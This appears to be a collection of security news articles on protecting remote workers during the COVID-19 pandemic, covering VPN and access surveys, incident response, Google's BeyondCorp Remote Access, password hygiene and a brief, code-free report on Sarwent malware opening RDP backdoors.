Defending against attacks can be enhanced by layering protection—like an onion. Physical defense like VPNs, firewalls, and encryption all help protect information at rest and in transit. But knowledge, education, and training are key components of a holistic security plan. This intangible piece may be the most important of all.

Many attacks target the weakest points of an organization – often its people – and no matter how thick your walls are or how heavy the gate is, if someone opens the door for an attacker, attackers can breach the soft, inner core of your company.

While an attack can happen at any time and in any location, cybersecurity concerns are dramatically higher when working remotely because of IT department’s limited visibility and control over the environment. Workers that have questions around understanding potential threats and how to handle them are ever present, but outside the protection of corporate walls, those threats can be even greater, so additional training or a refresher may be in order. For example, knowing how to identify and foil social engineering attacks, particularly through phishing attempts, is always a good training topic. Watching out for malware is another, as that can compromise a device by installing a keylogger, ransomware, or spyware.

Review budgets and make sure cybersecurity is taken into account

Even as the country starts to re-open to business, and people start to slowly return to offices, the COVID-19 crisis has been a wake-up call to companies to better understand their capabilities to support remote workers. With the possibility of a resurgence in the fall, now is the time to review and make infrastructure investments and upgrades, find more secure ways to share information, and update policies and procedures to cover the shift in work environments and habits.

What many have realized over the last several months is the degree of interconnectedness among businesses that drive the economy, and the need for services and solutions to work in a remote setting while in the midst of a major health threat. Supporting remote workers is a non-trivial problem for many organizations, but one that needs to be addressed. We have been thrust into a new world and way of doing things that has upended many of our expectations and understandings, and it’s important to be flexible, open to ideas, and continue to focus on driving productivity while protecting your employees.

41% of organizations have not taken any steps to expand secure access for the remote workforce

Currently, organizations are struggling to adjust to the new normal amidst the COVID-19 pandemic, a Bitglass survey reveals. 41% have not taken any steps to expand secure access for the remote workforce, and 50% are citing proper equipment as the biggest impediment to doing so. Consequently, 65% of organizations now enable personal devices to access managed applications. Remote work and secure access concerns When asked what their organizations are primarily concerned with securing while employees … More

The post 41% of organizations have not taken any steps to expand secure access for the remote workforce appeared first on Help Net Security.

Creating an emergency ready cybersecurity program

A large part of the world’s workforce has transitioned to working remotely, but as plans are being drawn up to reopen economies, the security industry is being challenged to develop stronger screening practices, emergency operations planning, and to deploy tools to detect and minimize the impact that future pandemics, natural disasters and cyberattacks can have on a company.

emergency ready cybersecurity program

Things like global security operation centers (SOCs), managed security services, thermal imaging and temperature screening for on-site visitors and employees and enhanced employee tracking capabilities are new areas of increased focus.

As security professionals are forced to reassess how the systems they monitor are working in this new environment, companies and organizations must still deal with day-to-day operations that are now more likely to occur on unsecured wireless networks. From data loss prevention and email spam protection to denial of service and data breach or leakage, there’s a large number of challenges to address as more and more workers work from home. So, what should businesses focus on to ensure security and safety?

The greatest vulnerabilities

One major cybersecurity shortcoming of companies is just how much of their network is accessible, both within an office and externally. As technology has advanced, the need for a secure network infrastructure is of the utmost importance to protect all company assets. That need is even more acute now, with many workers currently working from home on personal devices and unsecure wireless networks.

With the likely shift towards a more remote workforce in the coming years, across industries, wireless networks will need to be designed and revamped with security in mind.

Beyond the COVID-19 impact, IT teams still face non-standard deployments of technology in regard to security devices, as well as “bring your own device” options that are currently being used in every aspect of the IT world. IT groups also currently deal with a great deal of infrastructure that is aging without a replacement and/or a life-cycle management plan.

Additionally, “flat networks”, which were originally designed just to make sure everything could communicate, are still common. These networks were designed with very little regard for the security of edge devices and all other endpoints. Many enterprise customers are now retrofitting these networks to meet current cybersecurity requirements and recommendations. It is clear that security issues extend beyond our current, unforeseen circumstances and must still be dealt with promptly.

A strong incident response program

The success of security policies and systems depends on their proper implementation and a continuous improvement process to sustain the security program on a day-to-day basis. The program must meet business needs and appropriately mitigate security risks. By implementing an effective incident response program, a company will be able to use information generated from things like access control and video systems and ensure that a company’s security events are “real” and not falsely positives due to technological problems. Any strong IR program should be quick and accurate and with workers spread out around the globe.

Technology plays a growing role in almost all security programs but cannot be the ultimate factor when it comes to deciding which incidents require a response. As information becomes more integrated and easier to reach, successful IR programs ensure that the information delivered is accurate, relevant and actionable to security personnel. Technology may be providing the information avalanche, but it can also be used to effectively cull through the information and make sure the human operators only see what they are supposed to see.

The automation of security

How much of the world’s security can really be automated? Many simple tasks with access control and video systems are becoming more and more automated by the day. For example, video analytics are becoming more common on even the most basic security cameras and are less dependent on high-end servers than in the past.

Today, identification of people and vehicles can be accomplished through automation, rather than through human interaction. With remote workers, this is crucial. Many companies are now facing unexpected financial pressures and security budgets are being tightened. As such, automated processes for sending alerts and warnings have also taken on a larger role.

It is now expected, at the enterprise level, that every system should be able to auto-generate reports. Future deployment of all security-related technologies will further shrink the possibility of human error and the risk associated with those events, while providing a greater view for all stakeholders.

It goes without saying that we are in uncharted territory. As security experts work to shift security systems to accommodate the new reality we are living in, companies must find new ways to ensure the safety of their employees and their work – not just from COVID-19, but from additional challenges that come along with it.

As businesses across the world start to reopen, executives should be thinking about their cybersecurity protocols, and the best ways to utilize technology to their advantage. The most successful businesses will have strong, uniform IT standards and will be able to conduct their security work from any location, with a quick response.

Malware opens RDP backdoor into Windows systems

A new version of the Sarwent malware can open the Remote Desktop Protocol (RDP) port on target Windows computers to make sure that crooks can find their way back into the system through the backdoor.

Windows malware RDP backdoor

Whether that access is used later by the same crooks or sold to ransomware gangs or cyber espionage groups is unknown, but affected users should know that removing the malware does not close that particular “backdoor”.

Sarwent’s new capabilities

Sarwent is a piece of malware that started out as a loader for other malware, but has recently been updated with two new functionalities, SentinelOne researchers discovered.

These never variants can now also:

  • Execute commands via Windows Command Prompt and PowerShell
  • Create a new Windows user account, enable the RDP service for it, and make changes to the Windows firewall so that RDP access to the infected machine is allowed

Removing the malware from the infected computer will not automatically close the RDP “hole”. Users, admins or paid “cleaners” also have to remove the user account set up by the malware and close the RDP access port in the firewall.

RDP access: A hot commodity

Gaining access to Windows machines via the Remote Desktop Protocol has become a preferred tactic of cyber crooks and ransomware gangs, though they usually scan for machines/servers that already have RDP enabled and then they try to brute-force the passwords that safeguard access through it.

Since COVID-19 spread across the globe and many employees started working from home, RDP use has soared.

The crooks wielding Sarwent want to increase the chances of retaining access to the machine after the malware is found and removed.

It might be that they want to use that access themselves, to reinfect the computer at a later date. It’s also possible that they plant to rent or sell that access to other cyber gangs or individuals.

Access to corporate networks and systems is regularly sold on dark web forums and marketplaces.

Is remote work here to stay?

There’s no doubt COVID-19 set the remote work revolution on a fast track. And on that fast track, VPN usage soared to new heights with no signs of it slowing down. Companies had no choice but to close up shop and send their workers home, and just as quickly had to figure out how to secure that workforce.

remote work here to stay

But just how big is the spike? In a study conducted by OpenVPN, 30% of employees polled say their company recently implemented remote work capabilities for the first time. 61% already had remote work rules in place.

The accelerated need for virtualization also meant a massive uptick in VPN usage — but not just any VPNs. Business VPNs are booming, according to the study.

“VPNs are critical to our remote minset and provides us with flexibility of being remote.” – a survey participant.

68% of employees say their company expanded VPN usage as a direct result of COVID-19, and 29% say their organization started using a VPN for the first time.

But remote work is not completely new — in fact, it’s been on the rise for some time. Consider these stats:

From 2005 – 2017 there was a 159% jump in remote work. In 2015: 3.9 million U.S. workers were already remote. Today? Over 5 million. And there’s no sign of the surge slowing down now, or ever — especially in the current climate.

The study surveyed workers from 300 different companies across sectors such as technology, energy, education, healthcare, engineering, and construction, and explored how companies are handling the new remote era, during the pandemic.

The study explored how organizations are handling the new COVID-19 remote era — and how they are securing their teams. The study seeks to answer the question: “Is remote work really the future?” If the numbers are any indication, the answer is a resounding YES.

Business VPNs are essential

Businesses are recognizing a layered approach is always the best approach for combating cyberattacks — and a necessary component of this approach is to invest in a reputable business VPN.

Even if every cell phone and laptop comes equipped with a personal VPN in the future, businesses will still need a secure way for workers to access a private network, and they will need an enterprise VPN to do so.

A personal VPN provides you with secure, private access to the internet, which is valuable in its own right — but a business VPN gives you the ability to remotely access private network resources, often essential for completing work, and to securely connect your company’s branches and locations worldwide.

Nearly 70% of employees polled say their companies expanded business VPN usage, and 29% say their organization started using it for the first time. That’s a big boom, mostly due to COVID-19… but is it here to stay?

Surprisingly, not all companies are on board.

Of the 21% of polled employees whose companies have never used a VPN, 71% went on to say their companies are still neglecting to utilize this essential security tool, despite switching to remote work. This suggests many companies still do not have a network security plan in place for remote work, despite the current crisis.

The good news is the companies that have started with secure remote access are almost unanimously in favor of maintaining that protocol: 99% of surveyed employees whose companies use a VPN believe those companies will continue usage after the emergency phase of COVID-19 is over. This encouraging percentage suggests that business VPNs will continue to be an essential part of secure remote access for years to come.

“We have always used VPN for remote work, with 2FA. It would be absolute lunacy to not do so, and there is not a chance on earth that we would discontinue use of our VPN.” – a survey participant.

Is the pandemic pushing organizations to finally go remote?

Employers that have the ability, but have still chosen not to offer their employees remote work capabilities during this time, are falling behind. Those polled describe their employers as uncaring and reckless — willing to risk their health and safety rather than make necessary adjustments.

“My company informed us remote work would be implemented soon. But that doesn’t make up for the fact that so many were furloughed due to lack of preparedness.” – a survey participant.

This illustrates an important point: companies must be prepared, or people will suffer.

Organizations that take the time to establish a secure remote strategy will be far ahead of competitors who choose not to. Offering flexibility can have an enormous impact on companies and the future of their business.

Remote employee: “I have worked from home for five years. Working remotely has given my company and me an edge over other companies that had to suddenly pivot and learn to work remotely. While they still struggle to learn, we have become the leaders and teachers for those who have never done this.”

Office-bound employee: “I think when the economy stabilizes a bit, I may consider finding a different job with a company that provides a safer work environment.”

remote work here to stay

People have mixed feelings about remote work during this stressful era

According to the study, only 5% of employees claim their company willfully chooses to prevent remote work, despite having the capability to provide it. Of that 5% still working at the office, 53% were worried about increased exposure, 29% claimed more stress and anxiety, and 18% had difficulty procuring childcare, suggesting that working in the office during a pandemic can have immediate and serious consequences for employees’ well-being.

Increased stress and anxiety have been found to have a direct effect on performance at work, which means those few employees still forced to go into the office are likely unable to perform at the level their employers would hope for.

In contrast, 30% of employees report that their company recently implemented remote work capabilities for the first time, while 61% already had remote work capabilities in place.

Of those 91% currently working from home, many report positive impacts on their work: 65% enjoy the flexibility, 40% claim fewer distractions, 36% say working from home lowers their stress and anxiety, and 33% have noticed an increase in their productivity.

Companies that have made this change have happier, less stressed employees — and, of course, the ability to continue operating during these unprecedented times.

Remote work should include secure access

“VPNs/remote access is key to allowing people to work when they can. This is the cornerstone of our business continuity plan.” – a survey participant.

Remote work and business VPNs go hand-in-hand; for your team to have secure access to the resources they need, a business VPN is critical to creating an infrastructure safe from breaches.

Will remote work become the norm? Only time will tell— but COVID-19 has certainly revealed that remote work capabilities often make-or-break a company’s success. Those without the ability to pivot often fall behind — and quickly.

Google unveils secure remote access service to unburden enterprise VPNs

Google has made available BeyondCorp Remote Access, a cloud-based, zero trust service that allows employees, contractors and partners to securely access specific corporate resources from untrusted networks without having to use the company’s VPN.

remote access service

The goal is to help companies with a suddenly massive remote workforce from overburdening the company’s VPN infrastructure.

About BeyondCorp Remote Access

BeyondCorp Remote Access is a subscription-based service that is available through Google Cloud.

“This cloud solution — based on the zero trust approach we’ve used internally for almost a decade — lets your employees and extended workforce access internal web apps from virtually any device, anywhere, without a traditional remote-access VPN,” Google Cloud honchos Sunil Potti and Sampath Srinivas explained.

“Over time, we plan to offer the same capability, control, and additional protections for virtually any application or resource a user needs to access.”

Access to web apps and services is granted (or not) based on user identity, device identity, device security, location, and other metadata and signals collected through the browser or an endpoint agent that is installed on the user’s device (if the customer mandates it).

The web apps that can be accessed through the service can be hosted on Google Cloud, on other clouds, or on the customer’s premises. Enterprise admins can configure access policies for each app.

remote access service

“For example, you can enforce a policy that says: ‘My contract HR recruiters working from home on their own laptops can access our web-based document management system (and nothing else), but only if they are using the latest version of the OS, and are using phishing-resistant authentication like security keys.’ Or: ‘My timecard application should be safely available to all hourly employees on any device, anywhere,’” the duo explained.

The company’s long term plan is to “offer the same capability, control, and additional protections for virtually any application or resource a user needs to access.”

Cybersecurity in a remote workplace: A joint effort

The reaction to the COVID-19 pandemic has disrupted every aspect of life across the globe and many companies now find themselves with fully remote workforces.

With so many employees now working from home, business networks have been opened to countless untrusted networks and – potentially – some unsanctioned devices. Naturally, the question of security arises given the need to ensure that employees are well prepared for the challenges associated with remote work. It also means that businesses must be certain that their security infrastructure is well geared to secure personal and corporate data.

So, in the context of a remote workplace, how can organizations improve their cybersecurity and prevent workers falling prey to hackers?

The hacker’s way in

The remote workplace provides hackers with an increased number of possible attack routes, all of which organizations need to have on their radar. Chief among these concerns is the matter of authentication and authorization.

Last year was the worst on record for the number of data breaches resulting in exposed records and login credentials, and this trend shows no signs of stopping.

Meanwhile, attempted phishing attacks have been an equally common occurrence among workers, who are now receiving more emails than ever before. We’ve seen a sharp spike in phishing attacks and malicious fake domains as hackers attempt to capitalize on the situation, slipping in among legitimate correspondence and imitating colleagues to harvest credentials.

These two security concerns alone highlight the importance of workers staying vigilant and maintaining security awareness in their everyday work. By this we mean ensuring that passwords are randomly generated and unique across different accounts and that they’re using multi-factor authentication wherever possible. Doing so will help prevent attackers from tapping into computers, mobile devices and home wireless networks where they can access sensitive information.

Keeping cybercriminals at bay

When it comes to heightened security risks, businesses must always be thinking about the financial and reputational implications of any sensitive information being exposed. But how can they stay ahead of the hackers?

It falls on businesses to ensure that their security infrastructure is up to the challenge. This means having adequate access to critical resources through SaaS provided services, remote support for field workers, and a security architecture that functions in hybrid operations environments. For companies that have not transitioned to a remote-enabled, open network security architecture for at least some staff, this will likely be a fairly significant challenge.

But beyond this, it involves a culture of security awareness engrained throughout the company. Changes to the security infrastructure must be communicated to staff openly and transparently, as well as coordination between IT, security, HR and operations to ensure there are no gaps in security.

In addition to this, the onus falls on employees to ensure that their security hygiene is up to scratch. The human element is often the weakest link in the security chain, with workers failing to take basic steps to protect themselves against cybercriminals. Employees must adhere to and understand their employer’s security goals and guidelines, engaging in security training and awareness programs to drive cybersmart behavior at home. Doing so will go a long way in helping to keep an organization secure, fending off viruses and other malware.

Tools at your disposal

There are a large number of tools available to help organizations along the way. For example, password managers are an easy solution which can be quickly and seamlessly integrated into existing workflows. Additionally, they often also include multi-factor authentication features that provide additional security measures when people are logging in from different locations than normal.

Implementing these solutions kills two birds with one stone, by also enabling users to generate and store unique passwords for every login. The username and passwords are then stored within a secure vault, where they’re organized and encrypted for safekeeping and ease of access. By using solutions like password managers and turning on multi-factor authentication where available, users can improve their password hygiene, limiting the risk of being hacked.

Remote work done the right way

Ultimately, creating a stronger online security posture takes time and lots of education, but under the current circumstances, we all need to play our part. Businesses must be sure that their security infrastructure can handle the challenges of a remote workforce. But equally, every worker must understand that poor password hygiene, whether it’s failing to change a default password, password reuse or using weak credentials greatly increases the chances of being hacked.

What’s more, they must use security training and awareness programs to drive “cyber smart” behavior not only at work but also at home. Keeping your organization secure should be a priority in any circumstance, but it becomes even more relevant as remote working becomes the norm. When keeping employees and your organization secure, considering the necessary measures to account for this new way of working will go a long way.